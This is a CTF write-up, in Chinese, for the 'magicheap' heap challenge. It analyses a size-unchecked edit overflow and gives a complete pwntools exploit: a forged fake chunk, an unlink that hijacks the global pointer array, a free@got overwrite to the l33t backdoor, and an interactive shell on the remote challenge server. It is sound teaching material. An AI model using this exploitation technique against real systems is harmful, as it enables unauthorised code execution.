1,
标准heap题目
查看下ld和libc版本:
2,
- edit 功能:写入长度由用户给定,不按 chunk 实际大小检查,可以溢出到相邻 chunk 的 header,用来伪造 fake chunk
- 后门函数 l33t,目标是把它写进 free 的 GOT 表项
- free 相对安全:释放后会把 heaparray 中的指针置零,没有现成的 UAF / double free 可用,因此走 unlink
3,
条件:
edit 的 size 可控,能越过当前 chunk 写到下一个 chunk 的 header(堆溢出);
heaparray 为全局指针数组,地址固定为 0x6020C0(程序无 PIE),且 free 的 GOT 表项可写(非 Full RELRO);
libc 需无 tcache(如 2.23):若有 tcache,free 掉的 0xa0 大小 chunk 会先进 tcache,不会触发向前合并和 unlink——这也是第 1 步要先看 libc 版本的原因;
思路:
在 chunk0 的数据区伪造 fake chunk,令 fake->fd->bk == fake->bk->fd == heaparray[0] 通过 unlink 检查;free(chunk1) 时向前合并触发 unlink,把 heaparray[0] 改写成 heaparray-0x18,得到任意地址写,再把 free@got 改成后门 l33t。
poc
from pwn import *
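# Verbose pwntools I/O so each menu round-trip of the heap grooming is visible.
context.log_level = "debug"

# Load the target first so context picks up arch/bits from the binary.
elf = ELF("./magicheap")
context.binary = elf

# Remote instance by default; `python3 exp.py LOCAL` runs the binary locally
# instead (handy for attaching gdb or confirming the libc version first).
if args.LOCAL:
    r = process(elf.path)
else:
    r = remote("node4.buuoj.cn", 26690)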
def create(sz, content):
    """Menu option 1: allocate a chunk of ``sz`` bytes and fill it with ``content``.

    ``content`` is sent with a trailing newline; presumably the server reads at
    most ``sz`` bytes, so keep ``len(content) < sz`` unless the newline is
    meant to land in the chunk too.
    """
    dialogue = (
        ("choice :", "1"),
        ("Heap : ", str(sz)),
        ("heap:", content),
    )
    for prompt, answer in dialogue:
        r.sendlineafter(prompt, answer)
def edit(idx, sz, content):
    """Menu option 2: write ``sz`` bytes of ``content`` into heaparray[idx].

    ``sz`` is taken as-is and not checked against the chunk's real size, which
    is the heap overflow this exploit builds on.

    NOTE(review): sendline appends "\\n"; when ``len(content) == sz`` that extra
    byte stays in the server's input buffer and is swallowed by the next menu
    read. Harmless for this target, but switch to ``r.send`` for exact-size
    writes if the menu ever desynchronises.
    """
    dialogue = (
        ("choice :", "2"),
        ("Index :", str(idx)),
        ("Heap : ", str(sz)),
        ("heap : ", content),
    )
    for prompt, answer in dialogue:
        r.sendlineafter(prompt, answer)
def delete(idx):
    """Menu option 3: free heaparray[idx].

    Per the challenge analysis the server zeroes the slot after free(), so no
    dangling pointer survives; the free() call itself is what the exploit
    redirects once free@got has been overwritten.
    """
    dialogue = (
        ("choice :", "3"),
        ("Index :", str(idx)),
    )
    for prompt, answer in dialogue:
        r.sendlineafter(prompt, answer)
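# --- addresses -------------------------------------------------------------
# Global pointer array holding the allocated chunks (non-PIE binary, hence a
# fixed address). heaparray[0] is the slot the unlink primitive redirects.
heaparray_addr = 0x6020C0
# Backdoor function shipped in the binary, and the GOT slot of free().
getshell_addr = elf.symbols['l33t']
free_got = elf.got['free']

# Pre-flight: the last step writes free@got, so the GOT must be writable, and
# the hard-coded heaparray address only holds without PIE. Fail fast here
# rather than debugging an opaque crash on the target (log.error raises).
if elf.pie:
    log.error("binary is PIE: heaparray_addr / l33t cannot be hard-coded")
if elf.relro == "Full":
    log.error("Full RELRO: free@got is read-only, the GOT overwrite will not work")

# --- heap layout -----------------------------------------------------------
# malloc(0x90) yields a 0xa0-byte chunk, so chunk1's header sits at data0+0x90.
# chunk2 is a guard so that chunk1 does not border the top chunk when freed.
create(0x90, b"aaaa")  # 0: the fake chunk is built in this chunk's data
create(0x90, b"bbbb")  # 1: freeing it triggers backward consolidation
create(0x20, b"cccc")  # 2: guard

# --- fake chunk inside chunk0 ---------------------------------------------
# fd/bk are picked so the unlink sanity check passes with P == data0:
#   FD->bk == *(heaparray-0x18 + 0x18) == heaparray[0] == data0 == P
#   BK->fd == *(heaparray-0x10 + 0x10) == heaparray[0] == P
# Fake size 0x90 (|PREV_INUSE) makes next_chunk(fake) == chunk1. chunk1 gets
# prev_size = 0x90 (matches the fake size, satisfying the size/prev_size check
# of newer glibc) and size = 0xa0 with PREV_INUSE cleared so free() walks back.
fake_chunk = p64(0) + p64(0x91) + p64(heaparray_addr - 0x18) + p64(heaparray_addr - 0x10)
fake_chunk = fake_chunk.ljust(0x90, b'a')
fake_chunk += p64(0x90) + p64(0xa0)  # chunk1 header: prev_size, size
edit(0, 0x100, fake_chunk)           # overflow chunk0 into chunk1's header

# free(chunk1) -> backward consolidation -> unlink(fake):
#   FD->bk = BK; BK->fd = FD   =>   heaparray[0] = heaparray_addr - 0x18
# NOTE(review): needs a libc without tcache (or a full tcache bin for 0xa0);
# otherwise the chunk is cached and no consolidation happens — check the
# libc version before running this.
delete(1)

# heaparray[0] now points 0x18 below the array: a 0x20-byte write through it
# zeroes the three qwords preceding heaparray (harmless here) and sets
# heaparray[0] = &free@got.
payload = p64(0) * 3 + p64(free_got)
edit(0, 0x20, payload)

# heaparray[0] == &free@got, so this 8-byte write replaces free with l33t.
edit(0, 8, p64(getshell_addr))

# free(heaparray[0]) is now l33t(); the slot is only zeroed after the call.
delete(0)
r.interactive()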